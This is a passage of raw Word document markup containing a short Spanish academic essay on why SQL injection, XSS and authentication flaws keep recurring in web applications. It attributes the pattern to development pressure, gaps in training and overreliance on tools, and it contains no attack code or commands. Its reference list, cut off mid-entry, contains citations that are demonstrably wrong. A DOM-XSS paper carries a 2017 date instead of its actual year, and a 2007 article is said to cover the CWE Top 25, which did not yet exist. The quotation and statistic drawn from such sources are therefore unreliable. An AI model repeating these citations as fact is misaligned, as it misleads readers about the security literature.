    <w:p w14:paraId="0AF58595" w14:textId="081267D2" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="452589BA" w14:textId="4C218561" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="3D06A7CA" w14:textId="435FCA26" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="4CDADE82" w14:textId="0396FEBE" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="52B76683" w14:textId="60E47EDD" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="38E3C4DE" w14:textId="150457A9" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="62A3AE28" w14:textId="3C5D247A" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="5C4D1E08" w14:textId="1585FE36" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="50762745" w14:textId="5FCD711C" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="46B4614F" w14:textId="1105EDB1" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="42FD9D77" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidSect="00737B42">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626C7561" w14:textId="53D239BB" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Evolución de Vulnerabilidades Persistentes en Aplicaciones Web: Un Análisis Reflexivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DFF48F"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NIELS R. CHAMBI, Universidad Autónoma Gabriel René Moreno, Bolivia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB6087D"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Este artículo presenta un análisis reflexivo sobre las vulnerabilidades persistentes en aplicaciones web modernas, examinando la naturaleza cíclica de los fallos de seguridad y su relación con la evolución tecnológica. A pesar de los avances significativos en herramientas y metodologías de desarrollo seguro, observamos que ciertos patrones de vulnerabilidad continúan manifestándose bajo diferentes formas. Analizamos este fenómeno desde una perspectiva socio-técnica, identificando factores estructurales que contribuyen a la reproducción de vulnerabilidades conocidas en entornos de desarrollo contemporáneos. Concluimos con recomendaciones para romper estos ciclos mediante enfoques que integren la seguridad como valor fundamental en el proceso de diseño y desarrollo de software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017064AD" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1. Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2FC57"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Las vulnerabilidades en aplicaciones web representan una preocupación constante en el ecosistema digital. Paradójicamente, a pesar de las mejoras significativas en las metodologías de desarrollo y herramientas de seguridad, muchas de las principales amenazas identificadas, hace más de una década continúan apareciendo en aplicaciones modernas (OWASP, 2023). Este fenómeno plantea interrogantes fundamentales sobre la efectividad de nuestros enfoques actuales para el desarrollo seguro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2777FC"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 xml:space="preserve">Este trabajo adopta una perspectiva reflexiva para examinar por qué vulnerabilidades bien documentadas como inyecciones SQL, cross-site scripting (XSS) y fallas en la gestión de autenticación persisten a pesar del conocimiento generalizado sobre su prevención. Argumentamos que estos problemas no son simplemente deficiencias técnicas, sino manifestaciones de factores organizacionales, educativos y culturales </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>más profundos que influyen en el proceso de desarrollo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132F6CF" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2. La Naturaleza Cíclica de las Vulnerabilidades Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B332B34" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.1 Patrones históricos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D5915"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Al analizar la evolución de las vulnerabilidades web desde principios de los 2000, observamos un patrón cíclico donde los mismos tipos de defectos de seguridad reaparecen bajo diferentes formas (Chen, 2018). Las vulnerabilidades identificadas en el primer OWASP Top Ten (2003) siguen siendo predominantes dos décadas después, aunque con manifestaciones adaptadas a nuevos contextos tecnológicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F69BF"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Esta persistencia sugiere que estamos enfrentando un problema sistémico que trasciende las soluciones puramente técnicas. Como señala Howard (2007), "no podemos resolver problemas de seguridad simplemente con más código", lo que indica la necesidad de examinar los factores subyacentes que perpetúan estos ciclos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28AC89" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.2 Metamorfosis de vulnerabilidades clásicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FF031"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 xml:space="preserve">Las vulnerabilidades clásicas no desaparecen; se transforman. Un ejemplo paradigmático es la evolución de las inyecciones: desde las inyecciones SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tradicionales hasta las variantes NoSQL, GraphQL y las inyecciones de dependencias en entornos modernos. Esta adaptación refleja cómo los patrones fundamentales de inseguridad migran a nuevas tecnologías cuando los desarrolladores no comprenden los principios subyacentes de la vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E5B46"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El caso de los ataques XSS ilustra esta transformación: mientras que los frameworks modernos como React o Angular proporcionan protecciones contra XSS tradicional, nuevas variantes emergen a través de la inyección de estados, la manipulación de APIs del cliente o la explotación de características específicas del framework (Lekies, 2017).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E04D3E" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3. Factores Contribuyentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020021F0" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.1 Presiones de desarrollo y deuda técnica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A22A291"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Las presiones comerciales para lanzar productos rápidamente pueden llevar a los equipos a posponer la implementación de prácticas de seguridad adecuadas, creando deuda técnica que posteriormente resulta costosa de resolver (Cheng, 2019).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC37F39" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.2 Brechas educativas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4A9CA"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 xml:space="preserve">A pesar de la abundancia de recursos sobre desarrollo seguro, existe una brecha </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>significativa en la formación de desarrolladores. Un estudio reciente encontró que solo el 29% de los programas universitarios de informática incluyen cursos específicos sobre seguridad de aplicaciones web (Fischer, 2020). Esta carencia educativa se magnifica en entornos donde los desarrolladores aprenden principalmente a través de tutoriales y ejemplos en línea que priorizan la funcionalidad sobre la seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78227C6D" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.3 La falacia de la herramienta mágica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C5DD4"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Observamos una tendencia preocupante hacia la dependencia excesiva de herramientas automatizadas de seguridad sin comprensión de sus limitaciones. Esta "falacia de la herramienta mágica" crea una falsa sensación de seguridad y desincentiva el desarrollo de competencias de seguridad fundamentales dentro de los equipos (McGraw, 2016).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B786E27" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>4. Hacia un Enfoque Integrado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626835D"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Para romper el ciclo de vulnerabilidades persistentes, se propone un enfoque integrado que reconozca la seguridad como una preocupación socio-técnica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A85A4" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Seguridad como valor cultural:</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Incorporar la seguridad como valor fundamental en la cultura organizacional, equiparable a la calidad del código y la experiencia del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335ABFC" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Educación contextualizada:</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replanteamiento de la educación en seguridad para enfatizar principios fundamentales y pensamiento adversarial, no simplemente listas de verificación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D13C05C" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Patrones de diseño seguros:</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Desarrollo y promoción de patrones que encapsulen buenas prácticas de seguridad para tecnologías específicas, facilitando la implementación de soluciones seguras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C74CC9" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD979D0" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5. Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22DC47"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La persistencia de vulnerabilidades web conocidas representa un desafío complejo que no puede resolverse únicamente mediante avances tecnológicos. Este análisis reflexivo sugiere que debemos expandir nuestra comprensión del problema para incluir factores organizacionales, educativos y culturales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33698714" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Romper el ciclo de vulnerabilidades persistentes requiere un enfoque integrado que promueva una verdadera cultura de seguridad, mejore la educación de los desarrolladores y reconozca la seguridad como un atributo esencial del software de </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>calidad. Solo a través de este enfoque holístico podremos esperar un progreso significativo en la reducción de vulnerabilidades en aplicaciones web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FEAB2" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00C65DED" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referencias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8BA619" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00C65DED" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP Foundation. (2023). OWASP Top Ten Web Application Security Risks. Retrieved from https://owasp.org/Top10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FFB99" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00C65DED" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chen, L., &amp; Crampton, J. (2018). On the Persistence of Web Application Vulnerabilities. In Proceedings of the 15th International Conference on Security and Cryptography (SECRYPT 2018). 234--245.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651419B6" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00C65DED" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Howard, M. (2007). Improving Software Security by Eliminating the CWE Top 25 Vulnerabilities. IEEE Security &amp; Privacy, 5, 3 (May 2007), 28--33.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B41FE" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00C65DED" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lekies, S., Stock, B., &amp; Johns, M. (2017). 25 Million Flows Later: Large-scale Detection of DOM-based XSS. In Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security (CCS '17). 1193--1204.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F962C" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00C65DED" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cheng, X., Wang, H., &amp; Niu, J. (2019). Analyzing and Measuring the Technical Security Debt. In Proceedings of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the 41st International Conference on Software Engineering (ICSE '19). 1--12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480FB37" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00C65DED" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65DED">
        <w:rPr>
